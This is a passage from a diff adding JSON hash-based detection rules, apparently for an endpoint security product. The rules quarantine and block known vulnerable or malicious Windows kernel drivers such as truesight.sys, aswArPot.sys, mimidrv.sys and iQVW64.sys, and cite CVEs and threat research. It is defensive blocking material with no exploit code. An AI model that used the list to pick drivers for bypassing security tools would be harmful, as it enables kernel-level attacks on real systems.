"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145621Z", + "creation_date": "2026-03-23T11:45:32.145623Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e99d454a56845bb0e622cfd68b895b7868ef7e8a43424e5b7b803f5a2d25eca", + "comment": "Vulnerable Kernel Driver (aka psmounterex.sys) [https://www.loldrivers.io/drivers/0f64bf7a-2ef2-45ea-af7d-4e7c87d98777/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58c32a46-5fd9-5664-b82b-0e9da31d45c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152831Z", + "creation_date": "2026-03-23T11:45:31.152834Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48c7215dacce2bed9465430c8bf805418e02a4da4435014ffdc75d4a5c07a496", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58c85a4e-9092-53fd-949a-f88bc337233c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969186Z", + "creation_date": "2026-03-23T11:45:29.969188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969193Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ad0ab23023bc500c3b46f414a8b363c5f8700861bc4745cecc14dd34bcee9ed", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58ceb588-18c5-5b69-9dce-dcc370ac1c79", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818056Z", + "creation_date": "2026-03-23T11:45:31.818059Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e84f600c3ef63442368ea7dc9df85168c04d573ea765153a9cbf18e41dfc20f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58de1f8a-8e66-54d8-a340-7d04fa47cb24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604428Z", + "creation_date": "2026-03-23T11:45:29.604430Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "425406152227f499013a6c3fbcf7700d98351a30e7813a30f0003f48eceb08ec", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58f31ee9-16a9-58e1-b2db-0365085fd091", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822131Z", + "creation_date": "2026-03-23T11:45:30.822133Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822140Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87279855c17e3924ebfa07f51c1312d0e107f990f4ae174807ac4814da6179ac", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58fa725a-515e-58a5-a344-d8d9dfa82b9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984209Z", + "creation_date": "2026-03-23T11:45:29.984211Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984216Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "950a4c0c772021cee26011a92194f0e58d61588f77f2873aa0599dff52a160c9", + "comment": "Vulnerable Kernel Driver (aka AsrOmgDrv.sys) [https://www.loldrivers.io/drivers/3f39af20-802a-4909-a5de-7f6fe7aab350/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59071458-e0c8-54b9-b018-7f25f9004667", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606488Z", + "creation_date": "2026-03-23T11:45:29.606490Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606495Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57ecd1bb823cb213dc801950a3495d14359694e52cadbad51e78f0acaae2b98a", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "590a02c0-510a-5e5e-ab1d-c56790e4452f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979359Z", + "creation_date": "2026-03-23T11:45:29.979361Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979367Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32882949ea084434a376451ff8364243a50485a3b4af2f2240bb5f20c164543d", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5911a81c-9aef-5b11-91e7-c7409719e707", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832407Z", + "creation_date": "2026-03-23T11:45:30.832409Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832414Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16192d98b68513c3d62c313feb5eeace472439dea92fd0aca326f162eeffae5a", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "591b5214-159e-5624-8cdc-aded219f4db8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972090Z", + "creation_date": "2026-03-23T11:45:29.972092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972097Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cff9aa9046bdfd781d34f607d901a431a51bb7e5f48f4f681cc743b2cdedc98c", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5920aa1b-4245-55af-8d34-a88972d9c090", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816962Z", + "creation_date": "2026-03-23T11:45:30.816964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c03433ea3376f6f099ad77a4ce59187817d1bc0c3c0f55fd931320d909dd920", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "592228c1-9408-5faa-9fd2-a8fa4cfc129f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974034Z", + "creation_date": "2026-03-23T11:45:29.974036Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974041Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3eff841ea0f2786e5e0fed2744c0829719ad711fc9258eeaf81ed65a52a8918", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5933d707-bd6c-55b4-9959-a9f7ae2bf77f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159792Z", + "creation_date": "2026-03-23T11:45:31.159794Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159799Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05814beffff44b7713387f5595ba2f9a749e81d693a90e3c4e2af5f78cf049d8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5946badf-e989-571f-b024-7eb249a810c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471047Z", + "creation_date": "2026-03-23T11:45:30.471051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3327d9e938d4ae29de110e219662ce04932935a7886e99feb508ffe77c9e00c2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "594740a1-1bcd-5246-8840-5e6d28a1c045", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484902Z", + "creation_date": "2026-03-23T11:45:31.484905Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484915Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf652a6b20838d070f818f75a052a8194243cd0d25b047250905d6f8699f2c9e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59557248-f290-5621-bfeb-c548b67fe336", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821771Z", + "creation_date": "2026-03-23T11:45:31.821774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821783Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d2edb6e885dbbce00b2d8ce9cbfd41eebd8f31c791ca6399a85d72b7acf09a0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "595d949a-9edc-5c72-afa4-d8feaf6a0018", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968775Z", + "creation_date": "2026-03-23T11:45:29.968777Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968782Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fba53fa5825b568ce775e78bf2325f5444d2cad9ca96cb1b949de201c5186faf", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59684753-7d7d-5170-944b-c2e3b6c906fd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829954Z", + "creation_date": "2026-03-23T11:45:31.829958Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7626db66e81a226e9d8093e02bd762c8bd06197f26fd500430231fb0d992708", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "596d22ed-6126-54f4-8101-93f3d7e60dcb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150841Z", + "creation_date": "2026-03-23T11:45:31.150843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4d4b10032367ccfb43fd3a31c7fe20b21a0e858071a9e287afcb6530a6e85af", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "596fac43-c0f6-55a3-a44b-91dae0c09bb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145503Z", + "creation_date": "2026-03-23T11:45:31.145505Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145510Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab7b7cc9a42eed6c9e35eab55a8b9d49afabce8018f921f51506b16e52c56648", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "597bac2f-afcc-5ec3-81d9-fff27a6a4919", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147131Z", + "creation_date": "2026-03-23T11:45:32.147134Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147139Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47ec51b5f0ede1e70bd66f3f0152f9eb536d534565dbb7fcc3a05f542dbe4428", + "comment": "Vulnerable Kernel Driver (aka BdApiUtil64.sys) [https://blog.talosintelligence.com/byovd-loader-deadlock-ransomware/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5983dee3-180d-5e4b-88f9-150acc679834", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.146600Z", + "creation_date": "2026-03-23T11:45:31.146602Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146608Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c71c2d36e4ec7e5a99dfa343cd02da07c21ac95fe013f16ab12e653d5bc29d8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5998d8fd-a0e1-57e3-953e-8a17f7a4dc58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495337Z", + "creation_date": "2026-03-23T11:45:31.495340Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495349Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20f199fb2ab7e0fab4b6acf42758eef858e92fb9bdb393ef27b2cdac4e2c7cd9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59a15016-df38-5aa3-ac03-b50fe2847693", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476738Z", + "creation_date": "2026-03-23T11:45:30.476742Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476751Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b22adc61900fbdc26629dc1135344d878f6a368ec6df0d4ec374559cb669182", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] 